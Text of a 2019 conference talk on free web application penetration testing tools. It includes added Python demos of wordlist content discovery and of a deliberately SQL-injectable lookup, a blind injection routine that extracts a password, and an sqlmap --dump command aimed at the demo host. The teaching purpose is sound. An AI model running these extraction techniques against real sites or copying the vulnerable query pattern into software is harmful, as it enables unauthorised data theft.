The Tools of A Web Application Penetration Tester
Chuck Ben-Tzur CISSP, CISM, CRISC, PMP
October 10, 2019
SecTor 2019
Introduction
• A little about me…
• Provide an overview of some free and available tools that can be used
during a web application penetration test.
• Will be using the following:
• Custom PHP web application (www.dardaleh.com)
• Kali Linux (tools are NOT part of the distribution!)
• NOT Metasploit…
Disclaimer
• The views and opinions expressed in this session are based on MY
experience and testing methodology when using these tools.
• If you disagree, it is likely because…
• You worked on different applications/environment/technology stacks
• You used different testing methodology (different goals, approach)
• You used the tools wrong
[Diagram: Web Application Testing; User/Client Side and Server/System Side, with INPUT flowing in and OUTPUT flowing back]
Penetration Test and OWASP top 10
OWASP Top 10 (2017 edition)
• A1 - Injection
• A2 - Broken Authentication
• A3 - Sensitive Data Exposure
• A4 - XML External Entities (XXE)
• A5 - Broken Access Control
• A6 - Security Misconfiguration
• A7 - Cross-Site Scripting (XSS)
• A8 - Insecure Deserialization
• A9 - Using Components with Known Vulnerabilities
• A10 - Insufficient Logging & Monitoring
Reconnaissance
Enumeration
Vulnerability Analysis
Exploitation
Reporting
Arachni
• A feature-full, modular, high-performance Ruby framework aimed
towards helping penetration testers and administrators evaluate the
security of modern web applications.
• It is free, with its source code public and available for review.
source: https://www.arachni-scanner.com
Demo #1 (Arachni)
Developer Tools
• Chrome DevTools is a set of web developer tools built directly into
the Google Chrome browser.
• DevTools can help you edit pages on-the-fly and diagnose problems
quickly, which ultimately helps you build better websites, faster.
source: https://developers.google.com/web/tools/chrome-devtools
Demo #2 (Dev Tools)
OWASP ZAP
• OWASP (Open Web Application Security Project) ZAP (Zed Attack
Proxy) is an open-source web application security scanner.
• When used as a proxy server it allows the user to manipulate all of
the traffic that passes through it, including HTTPS traffic.
source: https://en.wikipedia.org/wiki/OWASP_ZAP
• To intercept HTTPS, the test browser must trust the root CA certificate that ZAP generates; otherwise every TLS site fails with a certificate warning.
Demo #3 (ZAP Proxy)
SecLists
• SecLists is a collection of multiple types of lists used during security
assessments, collected in one place. List types include usernames,
passwords, URLs, sensitive data patterns, fuzzing payloads, web
shells, and many more.
source: https://github.com/danielmiessler/SecLists
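Wordlists such as SecLists' Discovery/Web-Content files are only as useful as the logic that consumes them: a target that answers 200 for every unknown path (a "soft 404") makes a naive brute-forcer report every word as a finding. The following is an added example, not code from the talk or from the SecLists project. It shows the wordlist-driven content discovery loop with the soft-404 baseline check a practitioner adds before trusting the results. The wordlist, the fake site contents and the `fake_fetch` function are constructed for the demo (the www.dardaleh.com reference is the talk's own demo host; its real pages are not known); to run it against a real target, replace `fake_fetch` with a `requests.get` wrapper and load `SecLists/Discovery/Web-Content/common.txt`.

```python
import random
import string
from typing import Callable, Dict, List, Set, Tuple

# Constructed wordlist in the style of SecLists' Discovery/Web-Content files;
# for a real run load SecLists/Discovery/Web-Content/common.txt instead.
WORDLIST: List[str] = ["admin", "backup", "config.php", "index.php",
                       "login", "phpinfo.php", "uploads", "wp-admin"]

# Constructed stand-in for the target site: path -> (HTTP status, body).
# Any path not listed gets a 200 with a generic "not found" page, i.e. a
# soft 404 that would make a naive scanner report every word as a hit.
FAKE_SITE: Dict[str, Tuple[int, str]] = {
    "/index.php": (200, "<html>Welcome to dardaleh</html>"),
    "/login": (200, "<html><form>user / pass</form></html>"),
    "/admin": (302, ""),
    "/backup": (403, "Forbidden"),
}
SOFT_404: Tuple[int, str] = (200, "<html>Sorry, that page was not found</html>")

Fetch = Callable[[str], Tuple[int, str]]


def fake_fetch(path: str) -> Tuple[int, str]:
    """Offline replacement for an HTTP GET; swap in requests.get(base + path) for a real target."""
    return FAKE_SITE.get(path, SOFT_404)


def soft_404_fingerprint(fetch: Fetch, samples: int = 3) -> Set[Tuple[int, int]]:
    """Request random paths that cannot exist and record (status, body length) of the answers."""
    fingerprints: Set[Tuple[int, int]] = set()
    for _ in range(samples):
        junk = "/" + "".join(random.choices(string.ascii_lowercase, k=16))
        status, body = fetch(junk)
        fingerprints.add((status, len(body)))
    return fingerprints


def discover(fetch: Fetch, wordlist: List[str],
             detect_soft_404: bool = True) -> List[Tuple[str, int]]:
    """Wordlist-driven content discovery; returns (path, status) for each probable real resource."""
    baseline = soft_404_fingerprint(fetch) if detect_soft_404 else set()
    hits: List[Tuple[str, int]] = []
    for word in wordlist:
        path = "/" + word
        status, body = fetch(path)
        if status == 404:
            continue                      # hard 404: nothing there
        if (status, len(body)) in baseline:
            continue                      # identical to the catch-all page: not a hit
        hits.append((path, status))
    return hits


if __name__ == "__main__":
    print("naive   :", discover(fake_fetch, WORDLIST, detect_soft_404=False))
    print("filtered:", discover(fake_fetch, WORDLIST))
```

The naive pass lists all eight words; the filtered pass keeps only the four paths whose response differs from the catch-all page. Comparing on (status, body length) is the cheap fingerprint; production scanners also compare bodies with the random part stripped, because some sites echo the requested path into the error page and change the length on every request.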
SQLmap
• A penetration testing tool that automates the process of detecting
and exploiting SQL injection flaws providing its user interface in the
terminal.
• In addition to mapping and detecting vulnerabilities, the software
enables access to the database, editing and deleting data, and
viewing data in tables.
source: https://en.wikipedia.org/wiki/Sqlmap
• Stores session data and the information it collects locally (in its output directory), so an interrupted run can be resumed and results can be reviewed afterwards.
Demo #4 (SQLmap)
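What SQLmap automates is worth seeing by hand once, both to understand its output and to eliminate false positives later. The following is an added example, not code from the talk or from SQLmap: a deliberately vulnerable lookup that concatenates the request parameter into the query (the pattern SQLmap hunts for), the parameterised version beside it, the boolean-based detection test, and a blind character-by-character extraction that bisects on the code point the way SQLmap's boolean technique does. The in-memory SQLite database, the `users` table and the dummy credentials are constructed for the demo; the `page()` callables stand in for "does the response contain the record for this id".

```python
import sqlite3
from typing import Callable, Dict, Tuple

Page = Callable[[str], bool]   # "does the page render a row for this id parameter?"

# Constructed demo data: the values below are dummies, not real credentials.
ADMIN_PW_EXPR = "SELECT password FROM users WHERE username = 'admin'"


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "s3cr3t"), ("chuck", "hunter2")])
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> bool:
    """Deliberately vulnerable: the request parameter is concatenated into the SQL text."""
    sql = "SELECT username FROM users WHERE id = " + user_id
    return conn.execute(sql).fetchone() is not None


def lookup_safe(conn: sqlite3.Connection, user_id: str) -> bool:
    """Hardened form: a bound parameter is data, never SQL, so the tautologies below fail."""
    row = conn.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()
    return row is not None


def make_pages(conn: sqlite3.Connection) -> Tuple[Page, Page, Dict[str, int]]:
    counter = {"requests": 0}

    def vuln_page(user_id: str) -> bool:
        counter["requests"] += 1          # every probe is one HTTP request in a real test
        return lookup_vulnerable(conn, user_id)

    def safe_page(user_id: str) -> bool:
        return lookup_safe(conn, user_id)

    return vuln_page, safe_page, counter


def detect(page: Page) -> bool:
    """Boolean-based check: a true and a false tautology must produce different pages."""
    return page("1 AND 1=1") and not page("1 AND 1=2")


def extract_blind(page: Page, expr: str, max_len: int = 64) -> str:
    """Recover the result of `expr` one character at a time by bisecting on its code point."""
    out = ""
    for pos in range(1, max_len + 1):
        if not page(f"1 AND length(({expr})) >= {pos}"):
            break                         # past the end of the string
        lo, hi = 0, 127                   # printable ASCII is enough for this demo
        while lo < hi:
            mid = (lo + hi) // 2
            if page(f"1 AND unicode(substr(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    conn = build_db()
    vuln, safe, counter = make_pages(conn)
    print("vulnerable endpoint injectable:   ", detect(vuln))
    print("parameterised endpoint injectable:", detect(safe))
    print("admin password:", extract_blind(vuln, ADMIN_PW_EXPR),
          "recovered in", counter["requests"], "requests")
```

Two things to take from the run. First, the parameterised lookup is not injectable by this test because `"1 AND 1=1"` is compared as a string against the integer column and simply matches nothing, which is the behaviour a tester expects when SQLMap reports a parameter as not injectable. Second, a six-character secret costs about fifty requests through a boolean-blind channel (one length probe per position plus seven bisection probes per character), which is why SQLmap prefers UNION or error-based techniques when the application leaks them and why a blind `--dump` of a large table is noisy in the server logs. The equivalent SQLmap invocation against the talk's demo application would be along the lines of `sqlmap -u "http://www.dardaleh.com/user.php?id=1" --technique=B --dump` (the `user.php?id=` path is an assumption for illustration, not a known page on that site).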
BeEF
• BeEF (Browser Exploitation Framework) is a penetration testing tool that focuses on the web browser.
• It "hooks" a victim browser with a JavaScript payload (typically delivered through an XSS flaw or an attacker-controlled page) and then drives the hooked browser from the BeEF console.
source: https://beefproject.com/
Demo #5 (BeEF)
Things to Consider (Pros)
• Perfect for training and one-time projects
• If running multiple tools - allows for results comparison
• Usually very small footprint (or ability to run without install)
• Most tools provide APIs and can be integrated into Continuous
Integration pipelines, which is where much of their security value lies.
• Usually extensible, allowing other users to add or enhance functionality
• You can contribute directly and affect the product direction/functionality
• Can’t beat the price!
Things to Consider (Cons)
• No official ownership and support
• Little quality assurance (bugs, vulnerabilities) and response time
• No guarantee of regular updates (or may be completely abandoned)
• A little harder to use (e.g. library dependencies, command lines,
somewhat limited platforms)
• Limited reporting capabilities (e.g. customized reports)
• Malicious users and hackers have access to these too…
Final Thoughts
• These are tools to complement the follow-up (and manual) work:
• Elimination of False Positive findings (there is no SQL injection if there is no Database!)
• Actual penetration test (following up on the “low hanging fruits”)
• Perform threat modeling, assigning risks and reporting
• There are MORE tools out there (e.g. w3af, Nikto)
• Most tools will do more than one thing (scanning, exploiting, built-in payloads)
• There are some good commercial tools out there (free versions, supported, User Interface)
• Special thanks to Erich Samuel for his input…
Thank You